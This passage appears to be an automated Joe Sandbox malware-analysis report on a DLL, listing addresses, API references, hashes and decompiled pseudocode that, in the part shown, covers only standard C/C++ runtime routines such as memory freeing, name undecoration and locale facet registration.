                          0x6e2588c2
                          0x6e2588cc
                          0x6e2588cc
                          0x6e2588ce
                          0x6e2588d0
                          0x00000000
                          0x00000000
                          0x6e2588c7
                          0x6e2588c9
                          0x6e2588cb
                          0x6e2588cb
                          0x00000000
                          0x6e2588cb
                          0x00000000
                          0x6e2588c9
                          0x6e2588d2
                          0x6e2588d5
                          0x6e2588d7
                          0x6e2588e2
                          0x6e2588e4
                          0x6e2588ee
                          0x6e2588ee
                          0x6e2588f0
                          0x6e2588f2
                          0x00000000
                          0x00000000
                          0x6e2588e9
                          0x6e2588eb
                          0x6e2588ed
                          0x6e2588ed
                          0x00000000
                          0x6e2588ed
                          0x00000000
                          0x6e2588eb
                          0x6e2588ee
                          0x6e2588d5
                          0x6e2588f4
                          0x6e2588f4
                          0x6e2588f6
                          0x6e2588fa
                          0x6e2588fa
                          0x6e2588ff
                          0x6e258901
                          0x6e258904
                          0x6e258907
                          0x6e258909
                          0x6e25890c
                          0x6e258924
                          0x6e258927
                          0x6e25892a
                          0x6e258932
                          0x6e258937
                          0x6e25893c
                          0x00000000
                          0x6e25893c
                          0x6e25890e
                          0x6e258913
                          0x6e258916
                          0x6e25891b
                          0x6e25891e
                          0x6e258920
                          0x00000000
                          0x00000000
                          0x6e258922
                          0x6e25886f
                          0x00000000
                          0x6e258856
                          0x6e2587c9
                          0x6e2587c9
                          0x6e2587cb
                          0x6e2587cd
                          0x6e2587cd
                          0x6e2587d1
                          0x00000000
                          0x00000000
                          0x6e2587d5
                          0x6e2587e9
                          0x6e2587e9
                          0x6e2587d7
                          0x6e2587d7
                          0x6e2587d7
                          0x6e2587dd
                          0x00000000
                          0x6e2587df
                          0x6e2587df
                          0x6e2587e2
                          0x6e2587e7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e2587e7
                          0x6e2587dd
                          0x6e2587f2
                          0x6e2587f4
                          0x6e258943
                          0x6e258943
                          0x6e2587fa
                          0x6e2587fa
                          0x00000000
                          0x6e2587fa
                          0x00000000
                          0x6e2587f4
                          0x6e2587ed
                          0x6e2587ef
                          0x6e2587ef
                          0x00000000
                          0x6e2587ef
                          0x6e2587c7
                          0x00000000

                          APIs
                          • _free.LIBCMT ref: 6E2587FE
                          • _free.LIBCMT ref: 6E258822
                          • _free.LIBCMT ref: 6E2589A9
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E272130), ref: 6E2589BB
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E258A33
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A70,000000FF,?,0000003F,00000000,?), ref: 6E258A60
                          • _free.LIBCMT ref: 6E258B75
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                          • String ID: 0!'n$0!'n
                          • API String ID: 314583886-1210743812
                          • Opcode ID: 3b10f6e159776faeafea66aeba6cfd4dce3aeb173e0cf366b9780b57561367ea
                          • Instruction ID: 8658e827d0e1df55776df3c13426c912fb94c955fdc5083b5a76bfd8b80036cb
                          • Opcode Fuzzy Hash: 3b10f6e159776faeafea66aeba6cfd4dce3aeb173e0cf366b9780b57561367ea
                          • Instruction Fuzzy Hash: 87C1357592424EEBDB488FF9CE54AAA7BBBEF42314F1409BAD451D7380E7B08A11C750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24D3EF, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E24D3EF(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6e270c10) {
					E6E24CBD3(_t52);
					_t26 = _a4;
				}
				E6E24CBD3( *((intOrPtr*)(_t26 + 0x3c)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x30)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x34)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x38)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x28)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x2c)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x40)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x44)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6E24D23E(5,  &_v8);
				_v8 =  &_a4;
				return E6E24D28E(4,  &_v8);
			}




                          0x6e24d3f5
                          0x6e24d3f8
                          0x6e24d400
                          0x6e24d403
                          0x6e24d408
                          0x6e24d40b
                          0x6e24d40f
                          0x6e24d41a
                          0x6e24d425
                          0x6e24d430
                          0x6e24d43b
                          0x6e24d446
                          0x6e24d451
                          0x6e24d45c
                          0x6e24d46a
                          0x6e24d472
                          0x6e24d47b
                          0x6e24d483
                          0x6e24d497

                          APIs
                          • _free.LIBCMT ref: 6E24D403
                            • Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
                            • Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB
                          • _free.LIBCMT ref: 6E24D40F
                          • _free.LIBCMT ref: 6E24D41A
                          • _free.LIBCMT ref: 6E24D425
                          • _free.LIBCMT ref: 6E24D430
                          • _free.LIBCMT ref: 6E24D43B
                          • _free.LIBCMT ref: 6E24D446
                          • _free.LIBCMT ref: 6E24D451
                          • _free.LIBCMT ref: 6E24D45C
                          • _free.LIBCMT ref: 6E24D46A
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: b5c57d17f50339d7e7482d3a3b790ac603cd19325689644bcc7dc5f61ea148d3
                          • Instruction ID: 9f7c4102c4263e28cf1bc5931b56c6b5732a8b74c25de712ae395a4058aaa141
                          • Opcode Fuzzy Hash: b5c57d17f50339d7e7482d3a3b790ac603cd19325689644bcc7dc5f61ea148d3
                          • Instruction Fuzzy Hash: E711FB7954420CFFDB05DF98C841DDE3BBAEF04654B2144A0F9098F122DB7ADE549B80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2270E2, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 73COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 76%
                          			E6E2270E2(void* __ecx, void* __edx, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char* _t18;
				unsigned int _t23;
				char* _t26;
				intOrPtr* _t29;
				intOrPtr* _t30;
				unsigned int _t33;
				char* _t36;
				signed int* _t38;
				void* _t41;
				intOrPtr _t47;
				intOrPtr _t50;

				_t18 =  *0x6e2c7218; // 0x0
				_t41 =  *_t18 - 0x58;
				if(_t41 == 0) {
					 *0x6e2c7218 = _t18 + 1;
					_push("void");
					goto L16;
				} else {
					if(_t41 == 0) {
						 *0x6e2c7218 = _t18 + 1;
						_t23 =  *0x6e2c7220; // 0x0
						_t26 = "...";
						if(( !(_t23 >> 0x12) & 0x00000001) == 0) {
							_t26 = "<ellipsis>";
						}
						_push(_t26);
						L16:
						E6E225A6C(_a4);
						goto L17;
					} else {
						E6E226FEC(__edx,  &_v12);
						_t50 = _v8;
						if(_t50 != 0) {
							L11:
							_t29 = _a4;
							 *_t29 = _v12;
							 *((intOrPtr*)(_t29 + 4)) = _t50;
							return _t29;
						} else {
							_t30 =  *0x6e2c7218; // 0x0
							_t47 =  *_t30;
							if(_t47 == 0) {
								goto L11;
							} else {
								if(_t47 == 0x40) {
									 *0x6e2c7218 = _t30 + 1;
									goto L11;
								} else {
									if(_t47 == 0x5a) {
										 *0x6e2c7218 = _t30 + 1;
										_t33 =  *0x6e2c7220; // 0x0
										_t36 = ",...";
										if(( !(_t33 >> 0x12) & 0x00000001) == 0) {
											_t36 = ",<ellipsis>";
										}
										E6E225EB7( &_v12, _a4, _t36);
										L17:
										return _a4;
									} else {
										_t38 = _a4;
										_t38[1] = _t38[1] & 0x00000000;
										 *_t38 =  *_t38 & 0x00000000;
										_t38[1] = 2;
										return _t38;
									}
								}
							}
						}
					}
				}
			}
















                          0x6e2270e7
                          0x6e2270ef
                          0x6e2270f2
                          0x6e227195
                          0x6e22719a
                          0x00000000
                          0x6e2270f8
                          0x6e2270fc
                          0x6e227174
                          0x6e227179
                          0x6e227185
                          0x6e22718a
                          0x6e22718c
                          0x6e22718c
                          0x6e227191
                          0x6e22719f
                          0x6e2271a2
                          0x00000000
                          0x6e2270fe
                          0x6e227102
                          0x6e227107
                          0x6e22710d
                          0x6e227166
                          0x6e227166
                          0x6e22716c
                          0x6e22716e
                          0x6e227172
                          0x6e22710f
                          0x6e22710f
                          0x6e227114
                          0x6e227118
                          0x00000000
                          0x6e22711a
                          0x6e22711d
                          0x6e227161
                          0x00000000
                          0x6e22711f
                          0x6e227122
                          0x6e227135
                          0x6e22713a
                          0x6e227146
                          0x6e22714b
                          0x6e22714d
                          0x6e22714d
                          0x6e227159
                          0x6e2271a7
                          0x6e2271ab
                          0x6e227124
                          0x6e227124
                          0x6e227127
                          0x6e22712b
                          0x6e22712e
                          0x6e227133
                          0x6e227133
                          0x6e227122
                          0x6e22711d
                          0x6e227118
                          0x6e22710d
                          0x6e2270fc

                          APIs
                          • UnDecorator::getArgumentList.LIBVCRUNTIME ref: 6E227102
                            • Part of subcall function 6E226FEC: Replicator::operator[].LIBVCRUNTIME ref: 6E227058
                            • Part of subcall function 6E226FEC: DName::operator+=.LIBVCRUNTIME ref: 6E227060
                          • DName::operator+.LIBCMT ref: 6E227159
                          • DName::DName.LIBVCRUNTIME ref: 6E2271A2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                          • API String ID: 834187326-2211150622
                          • Opcode ID: 610bee019bb478f271409b3d8826ef367bfc60c77d29fab54251367a64c668b2
                          • Instruction ID: e36a2fff2aaca9da93800c7487182c7d0d0b7ae34ee3949ede7615e3ce7083e3
                          • Opcode Fuzzy Hash: 610bee019bb478f271409b3d8826ef367bfc60c77d29fab54251367a64c668b2
                          • Instruction Fuzzy Hash: 61219F7061460E9FDF84CFACC8A8BAA7BE6EF06755F084164E845CB291C770DA41DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20777F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20777F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t19;
				intOrPtr* _t20;
				intOrPtr* _t42;
				void* _t50;

				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t50 =  *0x6e2c6c10; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t50;
				_t19 = E6E1E161C(0x6e2c6b2c);
				_t38 = _a8;
				_t20 = E6E1E171B(_a8, _t19);
				_t48 = _t20;
				if(_t20 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t48);
				} else {
					if(_t50 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E207E4C(__ebx, _t38, __edx, _t48, _t50) - 0xffffffff;
						if(__eflags == 0) {
							_t42 =  &_v32;
							E6E1E1438(_t42);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							 *_t42 = _v0;
							return _t42;
						} else {
							_t48 = _v16;
							_v16 = _t48;
							_v4 = 1;
							E6E206FD3(__eflags, _t48);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t48 + 4))))();
							 *0x6e2c6c10 = _t48;
							goto L5;
						}
					} else {
						_t48 = _t50;
						goto L5;
					}
				}
			}












                          0x6e207786
                          0x6e207790
                          0x6e207795
                          0x6e2077a0
                          0x6e2077a4
                          0x6e2077a7
                          0x6e2077ac
                          0x6e2077b0
                          0x6e2077b5
                          0x6e2077b9
                          0x6e2077fe
                          0x6e207801
                          0x6e20780d
                          0x6e2077bb
                          0x6e2077bd
                          0x6e2077c3
                          0x6e2077c9
                          0x6e2077d1
                          0x6e2077d4
                          0x6e20780e
                          0x6e207811
                          0x6e20781f
                          0x6e207824
                          0x6e20782b
                          0x6e207830
                          0x6e2077d6
                          0x6e2077d6
                          0x6e2077d9
                          0x6e2077dd
                          0x6e2077e1
                          0x6e2077ee
                          0x6e2077f6
                          0x6e2077f8
                          0x00000000
                          0x6e2077f8
                          0x6e2077bf
                          0x6e2077bf
                          0x00000000
                          0x6e2077bf
                          0x6e2077bd

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E207786
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E207790
                          • int.LIBCPMT ref: 6E2077A7
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • codecvt.LIBCPMT ref: 6E2077CA
                          • std::_Facet_Register.LIBCPMT ref: 6E2077E1
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E207801
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20781F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
                          • String ID: ,k,n
                          • API String ID: 2594415655-471452842
                          • Opcode ID: 3dfab4b70d6542cd1a2806a9ce26b487951b8c9b1d2862f78e078a0c6e12c66e
                          • Instruction ID: 0179d36af2547f3a6f86643ce04adbca5e5398214e6b67d57264304a796339a0
                          • Opcode Fuzzy Hash: 3dfab4b70d6542cd1a2806a9ce26b487951b8c9b1d2862f78e078a0c6e12c66e
                          • Instruction Fuzzy Hash: B311E975A0061D9BCB01EBE4C844AEDB7BBBF44B14F100918E410AB3E0DFB4AA44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20EEEB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20EEEB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t321;
				signed int _t322;
				void* _t334;
				void* _t347;
				void* _t360;
				void* _t373;
				void* _t386;
				void* _t399;
				void* _t412;
				void* _t425;
				void* _t438;
				void* _t451;
				void* _t464;
				void* _t477;
				void* _t490;
				void* _t503;
				void* _t516;
				void* _t529;
				void* _t542;
				void* _t555;
				void* _t568;
				void* _t581;
				void* _t594;
				signed int _t853;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				void* _t990;

				_t920 = __edx;
				_t699 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t990 - 0x14, 0);
				_t945 =  *0x6e2c6e04; // 0x0
				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
				 *(_t990 - 0x10) = _t945;
				_t321 = E6E1E161C(0x6e2c6b30);
				_t702 =  *((intOrPtr*)(_t990 + 8));
				_t322 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t321);
				_t922 = _t322;
				if(_t322 != 0) {
					L5:
					E6E2066BA(_t990 - 0x14);
					return E6E220075(_t922);
				} else {
					if(_t945 == 0) {
						_push( *((intOrPtr*)(_t990 + 8)));
						_push(_t990 - 0x10);
						__eflags = E6E210C9D(__ebx, _t702, __edx, _t922, _t945) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t990 - 0x20);
							E6E223D74(_t990 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t922, _t945, 0x14);
							E6E206653(_t990 - 0x14, 0);
							_t946 =  *0x6e2c6de4; // 0x0
							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
							 *(_t990 - 0x10) = _t946;
							_t334 = E6E1E161C(0x6e2c6d90);
							_t709 =  *((intOrPtr*)(_t990 + 8));
							_t923 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t334);
							__eflags = _t923;
							if(_t923 != 0) {
								L12:
								E6E2066BA(_t990 - 0x14);
								return E6E220075(_t923);
							} else {
								__eflags = _t946;
								if(_t946 == 0) {
									_push( *((intOrPtr*)(_t990 + 8)));
									_push(_t990 - 0x10);
									__eflags = E6E210D03(_t699, _t709, __edx, _t923, _t946) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t990 - 0x20);
										E6E223D74(_t990 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t699, _t923, _t946, 0x14);
										E6E206653(_t990 - 0x14, 0);
										_t947 =  *0x6e2c6db4; // 0x0
										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
										 *(_t990 - 0x10) = _t947;
										_t347 = E6E1E161C(0x6e2c6d68);
										_t716 =  *((intOrPtr*)(_t990 + 8));
										_t924 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t347);
										__eflags = _t924;
										if(_t924 != 0) {
											L19:
											E6E2066BA(_t990 - 0x14);
											return E6E220075(_t924);
										} else {
											__eflags = _t947;
											if(_t947 == 0) {
												_push( *((intOrPtr*)(_t990 + 8)));
												_push(_t990 - 0x10);
												__eflags = E6E210DA5(_t699, _t716, __edx, _t924, _t947) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t990 - 0x20);
													E6E223D74(_t990 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t699, _t924, _t947, 0x14);
													E6E206653(_t990 - 0x14, 0);
													_t948 =  *0x6e2c6dd4; // 0x0
													 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
													 *(_t990 - 0x10) = _t948;
													_t360 = E6E1E161C(0x6e2c6b28);
													_t723 =  *((intOrPtr*)(_t990 + 8));
													_t925 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t360);
													__eflags = _t925;
													if(_t925 != 0) {
														L26:
														E6E2066BA(_t990 - 0x14);
														return E6E220075(_t925);
													} else {
														__eflags = _t948;
														if(_t948 == 0) {
															_push( *((intOrPtr*)(_t990 + 8)));
															_push(_t990 - 0x10);
															__eflags = E6E210E47(_t699, _t723, _t920, _t925, _t948) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t990 - 0x20);
																E6E223D74(_t990 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t699, _t925, _t948, 0x14);
																E6E206653(_t990 - 0x14, 0);
																_t949 =  *0x6e2c6de8; // 0x0
																 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																 *(_t990 - 0x10) = _t949;
																_t373 = E6E1E161C(0x6e2c6d94);
																_t730 =  *((intOrPtr*)(_t990 + 8));
																_t926 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t373);
																__eflags = _t926;
																if(_t926 != 0) {
																	L33:
																	E6E2066BA(_t990 - 0x14);
																	return E6E220075(_t926);
																} else {
																	__eflags = _t949;
																	if(_t949 == 0) {
																		_push( *((intOrPtr*)(_t990 + 8)));
																		_push(_t990 - 0x10);
																		__eflags = E6E210EB7(_t699, _t730, _t920, _t926, _t949) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t990 - 0x20);
																			E6E223D74(_t990 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t699, _t926, _t949, 0x14);
																			E6E206653(_t990 - 0x14, 0);
																			_t950 =  *0x6e2c6db8; // 0x0
																			 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																			 *(_t990 - 0x10) = _t950;
																			_t386 = E6E1E161C(0x6e2c6d6c);
																			_t737 =  *((intOrPtr*)(_t990 + 8));
																			_t927 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t386);
																			__eflags = _t927;
																			if(_t927 != 0) {
																				L40:
																				E6E2066BA(_t990 - 0x14);
																				return E6E220075(_t927);
																			} else {
																				__eflags = _t950;
																				if(_t950 == 0) {
																					_push( *((intOrPtr*)(_t990 + 8)));
																					_push(_t990 - 0x10);
																					__eflags = E6E210F1F(_t699, _t737, _t920, _t927, _t950) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t990 - 0x20);
																						E6E223D74(_t990 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t699, _t927, _t950, 0x14);
																						E6E206653(_t990 - 0x14, 0);
																						_t951 =  *0x6e2c6dec; // 0x0
																						 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																						 *(_t990 - 0x10) = _t951;
																						_t399 = E6E1E161C(0x6e2c6d98);
																						_t744 =  *((intOrPtr*)(_t990 + 8));
																						_t928 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t399);
																						__eflags = _t928;
																						if(_t928 != 0) {
																							L47:
																							E6E2066BA(_t990 - 0x14);
																							return E6E220075(_t928);
																						} else {
																							__eflags = _t951;
																							if(_t951 == 0) {
																								_push( *((intOrPtr*)(_t990 + 8)));
																								_push(_t990 - 0x10);
																								__eflags = E6E210F87(_t699, _t744, _t920, _t928, _t951) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t990 - 0x20);
																									E6E223D74(_t990 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t699, _t928, _t951, 0x14);
																									E6E206653(_t990 - 0x14, 0);
																									_t952 =  *0x6e2c6dbc; // 0x0
																									 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																									 *(_t990 - 0x10) = _t952;
																									_t412 = E6E1E161C(0x6e2c6d70);
																									_t751 =  *((intOrPtr*)(_t990 + 8));
																									_t929 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t412);
																									__eflags = _t929;
																									if(_t929 != 0) {
																										L54:
																										E6E2066BA(_t990 - 0x14);
																										return E6E220075(_t929);
																									} else {
																										__eflags = _t952;
																										if(_t952 == 0) {
																											_push( *((intOrPtr*)(_t990 + 8)));
																											_push(_t990 - 0x10);
																											__eflags = E6E210FEF(_t699, _t751, _t920, _t929, _t952) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t990 - 0x20);
																												E6E223D74(_t990 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t699, _t929, _t952, 0x14);
																												E6E206653(_t990 - 0x14, 0);
																												_t953 =  *0x6e2c6df0; // 0x0
																												 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																												 *(_t990 - 0x10) = _t953;
																												_t425 = E6E1E161C(0x6e2c6d9c);
																												_t758 =  *((intOrPtr*)(_t990 + 8));
																												_t930 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t425);
																												__eflags = _t930;
																												if(_t930 != 0) {
																													L61:
																													E6E2066BA(_t990 - 0x14);
																													return E6E220075(_t930);
																												} else {
																													__eflags = _t953;
																													if(_t953 == 0) {
																														_push( *((intOrPtr*)(_t990 + 8)));
																														_push(_t990 - 0x10);
																														__eflags = E6E211057(_t699, _t758, _t920, _t930, _t953) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t990 - 0x20);
																															E6E223D74(_t990 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t699, _t930, _t953, 0x14);
																															E6E206653(_t990 - 0x14, 0);
																															_t954 =  *0x6e2c6dc0; // 0x0
																															 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																															 *(_t990 - 0x10) = _t954;
																															_t438 = E6E1E161C(0x6e2c6d74);
																															_t765 =  *((intOrPtr*)(_t990 + 8));
																															_t931 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t438);
																															__eflags = _t931;
																															if(_t931 != 0) {
																																L68:
																																E6E2066BA(_t990 - 0x14);
																																return E6E220075(_t931);
																															} else {
																																__eflags = _t954;
																																if(_t954 == 0) {
																																	_push( *((intOrPtr*)(_t990 + 8)));
																																	_push(_t990 - 0x10);
																																	__eflags = E6E2110BF(_t699, _t765, _t920, _t931, _t954) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t990 - 0x20);
																																		E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t699, _t931, _t954, 0x14);
																																		E6E206653(_t990 - 0x14, 0);
																																		_t955 =  *0x6e2c6df8; // 0x0
																																		 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																		 *(_t990 - 0x10) = _t955;
																																		_t451 = E6E1E161C(0x6e2c6da4);
																																		_t772 =  *((intOrPtr*)(_t990 + 8));
																																		_t932 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t451);
																																		__eflags = _t932;
																																		if(_t932 != 0) {
																																			L75:
																																			E6E2066BA(_t990 - 0x14);
																																			return E6E220075(_t932);
																																		} else {
																																			__eflags = _t955;
																																			if(_t955 == 0) {
																																				_push( *((intOrPtr*)(_t990 + 8)));
																																				_push(_t990 - 0x10);
																																				__eflags = E6E211127(_t699, _t772, _t920, _t932, _t955) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t990 - 0x20);
																																					E6E223D74(_t990 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t699, _t932, _t955, 0x14);
																																					E6E206653(_t990 - 0x14, 0);
																																					_t956 =  *0x6e2c6df4; // 0x0
																																					 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
																																					 *(_t990 - 0x10) = _t956;
																																					_t464 = E6E1E161C(0x6e2c6da0);
																																					_t779 =  *((intOrPtr*)(_t990 + 8));
																																					_t933 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t464);
